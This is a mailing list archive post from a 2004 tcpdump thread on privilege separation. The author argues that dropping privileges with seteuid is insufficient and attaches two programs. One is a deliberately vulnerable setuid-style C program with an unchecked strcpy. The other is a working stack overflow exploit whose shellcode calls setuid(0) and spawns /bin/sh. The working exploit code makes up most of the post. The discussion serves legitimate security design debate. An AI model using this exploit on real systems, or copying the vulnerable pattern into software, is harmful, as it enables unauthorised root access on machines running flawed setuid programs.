tcpdump mailing list archives
Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC
From: Rodrigo Rubira Branco <rodrigo () firewalls com br>
Date: Wed, 25 Feb 2004 17:00:25 -0300
Pekka,I attached in this mail one vuln.c program and one exploit.c to demonstrate the shellcode calls to setuid(0) and gain root privilegies...
This technique is a single demonstration about I mentionated later. Thank you, Rodrigo. Pekka Savola wrote:
On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:Simply call to setuid(getuid()) isn't sufficient, because if an attacker discovery buffer overflow, is possibly to he insert call to setuid in your shellcode, and gain root privilegies.Hmm.. I'm not sure if I understand what you're referrning to? Could you elaborate + provide a patch or description of the "proper" means?It is assumed that the attacker would only be able to insert shellcode or exploit the system after the privileges have been dropped -- not before that.Note that setuid(getuid()) is only done if the binary is setuid root. For regular binary, you'll setuid to the specific account.
-- Rodrigo Rubira Branco Seguranc,a & Infra-Estrutura Firewalls Security Corporation rodrigo () firewalls com br Tel: 55(14) 3234-5665 Cel: 55(14) 9795-1850 Site: http://www.firewalls.com.br Informativo de Privacidade As informac,o~es contidas neste "email" e nos arquivos anexados sa~o para o usoexclusivo do destinata'rio aqui indicado, e podem conter segredos comerciais, de propriedade intelectual ou outras informac,o~es confidenciais, protegidas pelas leis aplica'veis. Caso na~o seja o destinata'rio correto, esteja notificado, pelo
presente, que qualquer revisa~o, leitura, co'pia e/ou divulgac,a~o do conteu'do deste "email" sa~o estritamente proibidas e na~o autorizadas. Por favor, apague o conteu'do do "email" e notifique o remetente imediatamente. Obrigado pela cooperac,a~o.
#include<stdio.h> #include<stdlib.h> #define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90 char shellcode[]= "\x31\xc0" "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07" "\x89\x46\x0c" "\xb0\x0b" "\x89\xf3" "\x8d\x4e\x08" "\x8d\x56\x0c" "\xcd\x80" "\x31\xdb" "\x89\xd8" "\x40" "\xcd\x80" "\xe8\xdc\xff\xff\xff" "/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+ALIGN+1],*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; for(i=0;i<bsize;i+=4) { buff[i+ALIGN]=(addr&0x000000ff); buff[i+ALIGN+1]=(addr&0x0000ff00)>>8; buff[i+ALIGN+2]=(addr&0x00ff0000)>>16; buff[i+ALIGN+3]=(addr&0xff000000)>>24; } for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0'; printf("Jump to 0x%08x\n",addr); execl("./vuln","vuln",buff,0); }
#include<string.h> #include<unistd.h> int main(int argc,char **argv) { char buffer[1024]; seteuid(getuid()); if(argc>1) strcpy(buffer,argv[1]); }
Current thread:
- Re: OpenBSD work on Tcpdump privilege separation, (continued)
- Re: OpenBSD work on Tcpdump privilege separation Jefferson Ogata (Feb 24)
- chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Pekka Savola (Feb 25)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Jefferson Ogata (Feb 25)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Pekka Savola (Feb 25)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Hannes Gredler (Feb 25)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Andrew Pimlott (Feb 26)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Pekka Savola (Feb 26)
- Re: chroot and setuid [Re: OpenBSD work on Tcpdump privilege separation] Andrew Pimlott (Feb 26)
- Re: OpenBSD work on Tcpdump privilege separation Rodrigo Rubira Branco (Feb 25)
- Re: OpenBSD work on Tcpdump privilege separation Pekka Savola (Feb 25)
- Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC Rodrigo Rubira Branco (Feb 25)
- Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC Pekka Savola (Feb 25)